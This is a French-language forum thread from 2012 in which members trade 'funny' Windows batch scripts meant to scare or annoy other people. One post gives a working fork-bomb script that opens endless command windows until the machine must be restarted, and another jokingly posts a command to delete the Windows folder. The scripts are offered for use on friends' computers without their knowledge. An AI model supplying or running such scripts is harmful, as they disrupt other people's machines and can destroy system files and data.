1. Ce site utilise des cookies. En continuant à utiliser ce site, vous acceptez l'utilisation des cookies. En savoir plus.
  2. Rejeter la notice

Quelques trucs amusants en .bat

Discussion dans 'Windows' créé par Waa, 21 Août 2012.

Statut de la discussion:
N'est pas ouverte pour d'autres réponses.
  1. Waa

Waa Ancien staff Ancien staff

Inscrit:
    30 Avril 2012
    Appréciations:
    2 206
    Salut à tous, je vous fais ajourd'hui part d'une chose qui me fais pas mal rire, et qui est simple.

C'est le .bat ; "C'est quoi le .bat ?"

Et bien le .bat est un fichier comme .txt ou .jpeg, mais uniquement pour les blocs-notes, et qui ouvre les grandes fenêtres noires bien connus dans les films où il y a souvent des scènes de "Hacking".

"Ok c'est cool mais comment je met un bloc-notes en fichier .bat ?"

Pour mettre un bloc-notes en .bat, rien de plus simple ; Vous écrivez ce que vous désirez dans le bloc-notes puis l'enregistez en y mettant .bat à la fin, exemple : exemple.bat

Je vous mets ici un site pour apprendre le batch :

Bonjour visiteur, merci de vous inscrire ou de vous connecter pour voir les liens. C'est gratuit en 3 secondes !

Alors voilà, je vous mets à disposition quelques fichiers .bat pour rire, ou faire peur aux gens. :evil:

PS : j'éditerais la liste des fichiers au fur et à mesure que j'en créerai de nouveaux. <3

Bonjour visiteur, merci de vous inscrire ou de vous connecter afin de voir le contenu de cette balise. Cela est gratuit et ne prend que quelques secondes !

Bonjour visiteur, merci de vous inscrire ou de vous connecter afin de voir le contenu de cette balise. Cela est gratuit et ne prend que quelques secondes !

Ni moi ni RealityGaming ne sera tenu responsable si vous changez quelque chose dans le fichier et que cela endommage votre PC.

2. Sulfus

Sulfus Videomaker Ancien staff

Inscrit:
    10 Janvier 2012
    Appréciations:
    2 362
    Le Batch est " expliqué pour les noob " comme l'utilitaire principale des commande basique de windows , vous pouvez faire énormément de chose sympa et marrante avec , attention sachez que des virus sont crées en batch puis mis en .exe pour les faire ressembler à des programmes normaux , ils sont en faites des méchants virus qui boufferont la carte graphique de votre ordinateur et qui pourront faire très mal , ne vous faites pas avoir.

( Edité par mon grand frère de 22 ans , Codeur Multi-langages )

Pour récupérer un batch il vous suffit de copier le code ( venant d'un forum .. d'un tuto ) de le coller sur le bloc note et d'enregistrer sous le format .bat à la place de .txt

Tiens un code plutôt sympa pour faire surchauffer un ordinateur ( pas de virus , coller le texte vous même sur le .txt et enrengistrer en .bat)

Merci de bien vouloir redémarré votre ordinateur si vous voulez pas de bobo !

Code:
    @ echo off
    title [Piratage en cours..]
    mode *** cols=999 lines=999
    color 0a
    :sulfus
    start
    start
    start
    start
    goto sulfus

Une fois ce .bat lancé , des millions de fenêtres vont s'ouvrir et vous faire horriblement lagger ! Redémarrage obligatoire x)

( Enlevez l'espace entre @ et echo , c'est un bug du forum^^)

3. xiMGz ||

xiMGz || Développer C# | Modder PS3 Premium

Inscrit:
    15 Juillet 2012
    Appréciations:
    1 028
    sa a l'air intéressent tous sa j'y penserais pour des pote :d:

4. Waa

Inscrit:
    30 Avril 2012
    Appréciations:
    2 206
    Tu le dis si tu veux le topic. :d: :rire2: <3

+ Liens de téléchargements mis. ( j'ai dû les upload autrement que via le forum, le forum ne prend pas les .bat :( )

5. PEGGAE

PEGGAE Gérant de Argents-Facile Ancien staff

Inscrit:
    1 Septembre 2011
    Appréciations:
    2 220
    Sa peut toujours être marrant a faire !

Mais a pas faire sur son PC , certaine commande son irréversible ...

6. Waa

Inscrit:
    30 Avril 2012
    Appréciations:
    2 206
    Celles que je vais proposer seront toujours simple et non dangereuse donc sans risque pour le pc. :hap:

7. Sulfus

Inscrit:
    10 Janvier 2012
    Appréciations:
    2 362
    Hmm..

Code:
    @ echo off
    DEL c:/windows

Comme ça par exemple ? XDD

8. Waa

Inscrit:
    30 Avril 2012
    Appréciations:
    2 206
    PEGGAE où puis-je uploader les fichiers .bat ?

9. Sulfus

Inscrit:
    10 Janvier 2012
    Appréciations:
    2 362
    Pas besoin de les upload , tu va galère , faut les mettre dans un rar pour les mettre directement sur un lien du forum.

Met juste comme moi la balise

[ code]

LE CODE DU BAT

[ /code]

( SANS espace pour fermer la balise)

Et les gens copie sur le bloc note et sauvegarde en bat c'est plus simple :)[/code]

M4gN3Tiis3uRz-- aime ça.
  10. PEGGAE

PEGGAE Gérant de Argents-Facile Ancien staff

Inscrit:
    1 Septembre 2011
    Appréciations:
    2 220
    Dans ton sujet , mais le mieux c'est mettre les codes, et ceux qui veulent mette dans un .txt et renomme .

Statut de la discussion:
N'est pas ouverte pour d'autres réponses.

Partager cette page

Les membres ont trouvé cette page en recherchant :

1. virus .bat marrant

,
  2. fichier .bat drôle

,
  3. .bat bloc note

,
  4. quelque commande sur bloc note,
  5. script drole bat,
  6. .bat fun,
  7. truc amusant a faire sur cmd,